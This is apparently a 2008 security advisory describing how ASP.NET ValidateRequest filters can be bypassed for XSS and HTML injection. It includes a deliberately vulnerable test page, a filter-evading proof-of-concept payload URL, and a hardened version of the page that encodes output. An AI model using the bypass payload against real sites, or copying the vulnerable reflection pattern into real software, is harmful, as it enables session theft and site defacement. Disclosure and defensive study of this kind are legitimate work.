Microsoft ASP.NET ValidateRequest Filters Bypassing Allows XSS And HTML Injection Attacks
29 Aug. 2008
Summary
By understanding how ASP.NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP.NET ValidateRequest filters and perform XSS and HTML injection even against systems protected with the MS07-040 patch. That patch fixed the payload reported in ProCheckUp security bulletin PR07-03.
It was possible to perform redirect, cookie theft, and unrestricted HTML injection attacks against an ASP.NET application set up in a test environment. ProCheckUp has also found this issue to be exploitable while carrying out penetration tests on several customers' live environments.
Proof of concept:
In the following examples, 'test3.aspx' is a script that solely relies on ASP.NET ValidateRequest filters and returns user-supplied input back to the browser unencoded.
<html>
<head><title>test3.aspx</title><script>document.cookie='PCUSESSIONID=stealme'</script></head>
<body>
<form action="test3.aspx" method="get">
    Your name: <input type="text" name="fname" size="20" />
    <input type="submit" value="Submit" />
</form>
<%
    ' Deliberately vulnerable test page: 'fname' is reflected with no output
    ' encoding, and it is written inside an open tag ("<tagname ..."), so any
    ' value that ValidateRequest lets through lands in attribute position.
    dim fname
    fname=Request.QueryString("fname")
    If fname<>"" Then
        Response.Write("Hello " & "<tagname " & fname & "!<br />")
        Response.Write("How are you today?")
    End If
%>
</body>
</html>
Alert box injection - simply provided for testing purposes (may cause DoS issues on Internet Explorer)
http://target.foo/test3.aspx?fname=<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
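A hardened counterpart to test3.aspx, added here as an example and not part of ProCheckUp's advisory (the file name test3-fixed.aspx and the Page directive are assumptions). Two changes matter. First, the reflected value is written as text content between tags rather than inside an open tag: the original's "<tagname " prefix places the value in attribute position, where a payload needs no "<" at all and HtmlEncode on its own would not stop a new STYLE= attribute from being added. Second, the value is passed through Server.HtmlEncode, so the page no longer depends on ValidateRequest recognising a given payload; ValidateRequest is left enabled only as defence in depth.

```aspx
<%@ Page Language="VB" ValidateRequest="true" %>
<%-- Added example, not ProCheckUp's code: hardened counterpart of test3.aspx.
     ValidateRequest stays on as defence in depth, but the page no longer
     relies on it to make reflected input safe. --%>
<html>
<head><title>test3-fixed.aspx</title></head>
<body>
<form action="test3-fixed.aspx" method="get">
    Your name: <input type="text" name="fname" size="20" />
    <input type="submit" value="Submit" />
</form>
<%
    ' Request.QueryString returns Nothing when the parameter is absent.
    Dim fname As String = Request.QueryString("fname")
    If Not String.IsNullOrEmpty(fname) Then
        ' 1. The value is emitted as text between tags, never inside a tag
        '    such as "<tagname ...", where a bare space would let a request
        '    start a new attribute that no HTML encoder can neutralise.
        ' 2. Server.HtmlEncode turns <, >, & and " into entities, so the
        '    browser can only ever render the value as literal text.
        Response.Write("Hello " & Server.HtmlEncode(fname) & "!<br />")
        Response.Write("How are you today?")
    End If
%>
</body>
</html>
```

With this version, the payload shown above is rendered on the page as the literal string "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>" whether or not ValidateRequest flags it. The same rule applies to every other output context: a value placed inside a quoted attribute needs attribute encoding and the surrounding quotes, and a value placed inside a script block needs JavaScript string encoding; HTML encoding in one context does not make the value safe in another.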
Consequences:
Attackers can potentially launch XSS and HTML injection attacks against vulnerable applications that solely rely on ASP.NET ValidateRequest filters. Such code would run within the context of the target domain.
This type of attack can result in defacement of the target site, or the redirection of confidential information (e.g. session IDs or passwords) to unauthorised third parties.